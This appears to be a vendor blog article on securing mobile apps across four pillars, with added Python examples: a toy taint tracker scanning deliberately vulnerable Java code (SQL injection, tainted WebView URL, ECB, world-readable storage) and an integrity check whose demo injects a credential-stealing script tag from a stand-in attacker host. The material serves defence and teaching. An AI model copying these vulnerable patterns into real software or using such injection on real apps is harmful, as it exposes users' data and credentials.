Historically, when companies think about mobile security, the first thing that comes to mind is how to deal with lost or compromised mobile devices. The good news is that many organizations are well on their way to blocking device-based risks by deploying enterprise mobility management (EMM) solutions such as IBM MaaS360.

After addressing device-related risks, businesses generally turn their attention to the applications on employees’ devices, to determine whether the apps pose a threat to user information or organizational data. To secure applications on corporate-owned or corporate-controlled devices, mobile application management (MAM) features have been added to EMM solutions. IBM MaaS360 is also a leader in the EMM marketplace.

More advanced protection measures, such as controlling logins to corporate networks based on device or location, can be added when a higher level of security protection is required.

Protecting the Apps You Build

Unfortunately, there is a gaping hole in many, if not most, mobile security programs: the mobile applications that companies build for their customers, partners, employees and, in fact, the entire world are generally not under the direct control of the security organization at all.

Mobile applications are taking up a greater percentage of new development budgets within corporations. For example, in its IT survey, “State of Application Development Report,” OutSystems found that:

  • Mobility was rated by 43 percent of respondents as the most critical business functionality or process for applications.
  • More than half of respondents plan to add a mobile component to between 51 and 100 percent of their applications.


Moreover, mobile apps are rapidly becoming the most important interaction point with all users. One would expect existing application security programs to cover mobile applications as part of existing protection efforts, but several factors have kept mobile applications out of such initiatives:

  • Organizations have been slow to recognize the threats posed by mobile applications, since apps have traditionally been viewed as “browsers in small packages.” However, as more data and more advanced capabilities reside on the device itself (local storage, cryptographic keys, business logic that an attacker can decompile and study), a multitude of new risks of compromise are added.
  • Many mobile applications are not built by corporate development organizations, which typically require multiple levels of testing and organizational compliance before applications are released. Instead, numerous marketing, e-commerce, customer care and related groups autonomously build their own mobile apps, and even more of them outsource mobile development to external consultants, integrators or digital agencies. A recent study by 451 Research found that 42 percent of mobile app development is being done outside of IT, and that within two years two-thirds of mobile apps will be developed externally.
  • In contrast to customary controls and processes that an IT organization can have over deployment of Web or desktop applications, mobile applications can be simply uploaded to an app store with little corporate oversight.

Four Pillars of Application Security Risk Management

So how should you go about securing the mobile applications that you build or have built for you? Ideally, your program should make use of four pillars of risk management:

  • Test application code for security vulnerabilities.
  • Test completed applications for security vulnerabilities and malware.
  • Test the back-end for new vulnerabilities surfaced by mobile applications.
  • Harden applications to keep them from potential tampering.

Testing Your Application Code

Testing application code should involve static analysis that follows the actual data flow within the code, from untrusted inputs such as intent extras, deep links and form fields to sensitive operations such as database queries, WebView loads and file writes, to determine where the code is vulnerable to attack. OWASP has issued a list of the top 10 mobile risks, which includes potential threats such as insecure data storage, client-side injection and broken cryptography.
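To make "data flow" concrete, the following Python sketch is an added example written for this page (it is not IBM AppScan Source's engine or any product's code). It tracks untrusted input through assignments in a constructed Android Java snippet and reports the OWASP Mobile Top 10 categories named above: tainted SQL and WebView URLs (client-side injection), a weak cipher mode (broken cryptography) and a world-readable file (insecure data storage). The source and sink lists, the `SAMPLE` activity code and the `m.example.com` host are assumptions; a real analyzer resolves types and follows calls across methods, which this toy does not.

```python
"""Toy intraprocedural taint tracker for Android Java source (added example, constructed input)."""
import re

# Taint sources: expressions that yield attacker-influenced strings (intent extras, deep links, UI fields).
SOURCES = ("getIntent().getStringExtra(", "getIntent().getData()",
           ".getQueryParameter(", ".getText().toString()")

# Sinks: method name -> (index of the argument that must not be tainted, finding label).
# Only the SQL/URL string argument matters; bound parameters (rawQuery's second argument) are safe.
SINKS = {
    "rawQuery": (0, "M7 client-side injection: attacker-controlled SQL string"),
    "execSQL": (0, "M7 client-side injection: attacker-controlled SQL string"),
    "loadUrl": (0, "M7 client-side injection: attacker-controlled WebView URL"),
}

# Weaknesses visible in a single call, no data flow needed.
PATTERN_RULES = (
    (re.compile(r'Cipher\.getInstance\("(?:DES|RC4|AES/ECB)[^"]*"\)'),
     "M6 broken cryptography: weak algorithm or ECB mode"),
    (re.compile(r"\bMODE_WORLD_(?:READABLE|WRITEABLE)\b"),
     "M2 insecure data storage: world-accessible file"),
)

# "Type name = expr;" or "name = expr;" on one line.
ASSIGNMENT = re.compile(r"^\s*(?:[\w<>\[\],]+\s+)?(\w+)\s*=\s*(.+);\s*$")


def _uses_source(expr):
    return any(src in expr for src in SOURCES)


def _tainted_vars_in(expr, tainted):
    return [v for v in tainted if re.search(rf"\b{re.escape(v)}\b", expr)]


def _call_args(line, name):
    """Top-level argument list of the first name(...) call on the line, or None."""
    m = re.search(rf"\b{name}\s*\(", line)
    if not m:
        return None
    depth, buf, args, in_str = 0, "", [], False
    for ch in line[m.end():]:
        if ch == '"':
            in_str = not in_str
        elif not in_str:
            if ch in "([{":
                depth += 1
            elif ch in ")]}":
                if depth == 0:
                    args.append(buf.strip())
                    return args
                depth -= 1
            elif ch == "," and depth == 0:
                args.append(buf.strip())
                buf = ""
                continue
        buf += ch
    return None  # unbalanced parentheses: give up on this line


def scan(java_source):
    """Return (line_no, label, evidence) findings; evidence is the taint chain for flow findings."""
    tainted = {}   # variable name -> description of where its taint came from
    findings = []
    for no, line in enumerate(java_source.splitlines(), 1):
        for regex, label in PATTERN_RULES:
            m = regex.search(line)
            if m:
                findings.append((no, label, m.group(0)))
        # Check sinks before propagating, so an assignment on the same line cannot mask the argument.
        for name, (idx, label) in SINKS.items():
            args = _call_args(line, name)
            if args and idx < len(args):
                if _uses_source(args[idx]):
                    findings.append((no, label, "untrusted input used directly"))
                else:
                    via = _tainted_vars_in(args[idx], tainted)
                    if via:
                        findings.append((no, label, tainted[via[0]]))
        # Propagate taint through assignments: direct source use, or concatenation with a tainted variable.
        m = ASSIGNMENT.match(line)
        if m:
            var, expr = m.groups()
            if _uses_source(expr):
                tainted[var] = f"{var} <- untrusted input (line {no})"
            else:
                via = _tainted_vars_in(expr, tainted)
                if via:
                    tainted[var] = f"{var} <- {tainted[via[0]]}"
                else:
                    tainted.pop(var, None)   # overwritten with a clean value


    return findings


# Constructed Activity fragment: lines 1-3 and 5-6 are injectable, line 4 is the parameterized fix.
SAMPLE = '''\
String user = getIntent().getStringExtra("user");
String query = "SELECT * FROM accounts WHERE owner = '" + user + "'";
Cursor rows = db.rawQuery(query, null);
Cursor byParam = db.rawQuery("SELECT * FROM accounts WHERE owner = ?", new String[]{user});
String page = "https://m.example.com/offers?id=" + getIntent().getStringExtra("id");
webView.loadUrl(page);
Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding");
SharedPreferences prefs = getSharedPreferences("session", MODE_WORLD_READABLE);
'''

if __name__ == "__main__":
    for no, label, evidence in scan(SAMPLE):
        print(f"line {no}: {label} [{evidence}]")
```

The point the sample makes is in line 4 of the snippet: the same `rawQuery` call with the same tainted `user` variable is not reported, because the taint reaches a bound parameter rather than the SQL string. Pattern matching on the method name alone cannot make that distinction; following the data flow can.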

Testing Your Completed Applications

When your development process has been completed, but before applications are uploaded to app stores or otherwise distributed, apps should be tested utilizing IBM Application Security on Cloud. Application Security on Cloud takes the built Android APK or iOS IPA, runs it and conducts automated penetration testing against it, judging results by how the application and device respond.

Because this type of dynamic analysis actually runs the application, it can identify vulnerabilities that static analysis cannot find. Conversely, some weaknesses are only visible in the source code itself. For the highest level of protection, use both techniques.

For most organizations, the best approach is to kick off your application security program with a straightforward solution such as Application Security on Cloud and then progress to IBM Security AppScan Source as your mobile application security program matures and expands.

Testing Your Back-End Services

Securing applications from potential vulnerabilities is a good start, but by itself it is insufficient. Mobile apps may surface new vulnerabilities in the back-end services and the data they access: an API endpoint built for the app is often reachable only through the app, so it may never have been exercised by the web-focused testing the organization already performs.

A good practice is to test the back-end using the mobile app itself. This can be performed with IBM Security AppScan Standard, which can be configured to penetration-test the back-end with the application running on a device emulator or even on a physical device.

Hardening Your Apps

So, finally you have a secure app and your work is done, or so you think! Remember, mobile apps are very different from traditional applications that remain under the control of your IT department.

Mobile apps by their nature live in the wild, in app stores and on devices. Even though they may be secure when they are deployed, once in the wild they are subject to a wide variety of attacks. For example, attackers can download apps, decompile them with readily available tools, insert malware and republish them (repackaging) in app stores where they look very similar to the authentic applications.

Such malware can do anything from tracking users’ locations, to intercepting transactions to and from financial institutions, to stealing users’ IDs, credentials and cryptographic keys, enabling hackers to impersonate authentic users to access personal or even corporate data.

How can you protect yourself from such threats? The answer is to harden your mobile applications, to protect them from being altered. IBM partners with one of the leading solution providers in this space, Arxan Technologies.

Arxan Application Protection for IBM Solutions leverages a variety of approaches to defend against and detect attacks, including the following:

  • Advanced obfuscation;
  • Encryption;
  • Metadata removal;
  • Checksums over code and data to detect modification;
  • Debug detection;
  • Resource verification;
  • Jailbreak/root detection; and
  • Swizzling detection (hooking of Objective-C methods at runtime on iOS).

As such, the solution can address a wide range of potential application attacks. If tampering is detected, applications can self-protect by shutting down, self-repairing or alerting you by phoning home.
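To show what the "checksum" and "resource verification" items in that list amount to, here is an added Python example written for this page; it is not Arxan's or IBM's implementation. It models a hybrid app whose web assets ship under `www/`: at build time every asset is hashed into a manifest and a single root digest of that manifest is embedded in the binary; at runtime the app recomputes the manifest and compares roots, and on mismatch reports exactly which assets were altered so it can shut down, restore them or phone home. The directory layout, file contents and the `attacker.invalid` host are constructed for the demonstration.

```python
"""Bundled-asset integrity check of the 'checksum' / 'resource verification' kind (added example)."""
import hashlib
import hmac
import os
import tempfile


def build_manifest(asset_dir):
    """Map each file under asset_dir (relative, '/'-separated) to its SHA-256, sorted by path."""
    manifest = {}
    for root, _, files in os.walk(asset_dir):
        for name in files:
            path = os.path.join(root, name)
            rel = os.path.relpath(path, asset_dir).replace(os.sep, "/")
            with open(path, "rb") as f:
                manifest[rel] = hashlib.sha256(f.read()).hexdigest()
    return dict(sorted(manifest.items()))


def manifest_root(manifest):
    """One digest over the canonical manifest encoding; this is the value compiled into the app."""
    h = hashlib.sha256()
    for path, digest in manifest.items():
        h.update(path.encode() + b"\0" + digest.encode() + b"\n")
    return h.hexdigest()


def diff_manifests(expected, current):
    """List (kind, path) for every asset that was modified, removed or added."""
    changes = []
    for path in sorted(set(expected) | set(current)):
        if path not in current:
            changes.append(("missing", path))
        elif path not in expected:
            changes.append(("added", path))
        elif expected[path] != current[path]:
            changes.append(("modified", path))
    return changes


def verify_resources(asset_dir, expected_manifest, expected_root):
    """Runtime check. Returns (ok, changes); on failure the app can shut down,
    restore the original assets or report to the back-end."""
    current = build_manifest(asset_dir)
    ok = hmac.compare_digest(manifest_root(current), expected_root)
    return ok, ([] if ok else diff_manifests(expected_manifest, current))


def demo():
    """Constructed scenario: a tiny hybrid app is packaged, then repackaged with an injected script."""
    with tempfile.TemporaryDirectory() as app:
        www = os.path.join(app, "www")
        os.makedirs(www)
        with open(os.path.join(www, "index.html"), "w") as f:
            f.write("<html><body><h1>Mobile Bank</h1></body></html>")
        with open(os.path.join(www, "config.json"), "w") as f:
            f.write('{"api": "https://api.example.com"}')  # constructed endpoint

        manifest = build_manifest(app)           # produced at build time
        root = manifest_root(manifest)           # embedded in the binary
        ok_before, _ = verify_resources(app, manifest, root)

        # Attacker repackages the app: injects a credential-stealing script and adds a native hook.
        with open(os.path.join(www, "index.html"), "a") as f:
            f.write('<script src="https://attacker.invalid/steal.js"></script>')
        os.makedirs(os.path.join(app, "lib"))
        with open(os.path.join(app, "lib", "hook.so"), "wb") as f:
            f.write(b"\x7fELF")  # constructed stand-in for an injected library
        ok_after, changes = verify_resources(app, manifest, root)
    return ok_before, ok_after, changes


if __name__ == "__main__":
    before, after, changes = demo()
    print("clean package verifies:", before)
    print("repackaged app verifies:", after, "changes:", changes)
```

The caveat a practitioner should keep in mind: the embedded root digest travels inside the same package the attacker is modifying, so a repackager who locates the comparison can update it or patch the branch. That is why products in this space pair checksums with obfuscation, several overlapping checks and a phone-home on failure rather than relying on a single compare. On Android the platform already enforces an APK signature, but a repackaged APK is simply re-signed with the attacker's key, so the complementary check is to compare the runtime signing certificate against a value pinned in the app.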

Putting It All Together

The four approaches we discussed (testing your application code, testing your completed apps, testing your back-end services and hardening your apps) are all vital protection measures for applications that are being built and deployed. Of course, you can always consider starting your risk management program with one of those options, gaining additional expertise, then improving security over time by implementing the other options as your experience grows.

But it’s only when you’ve built all four of the options into your secure development life cycle that you can experience the comfort of knowing you’ve done all you can do to effectively manage your mobile application security.
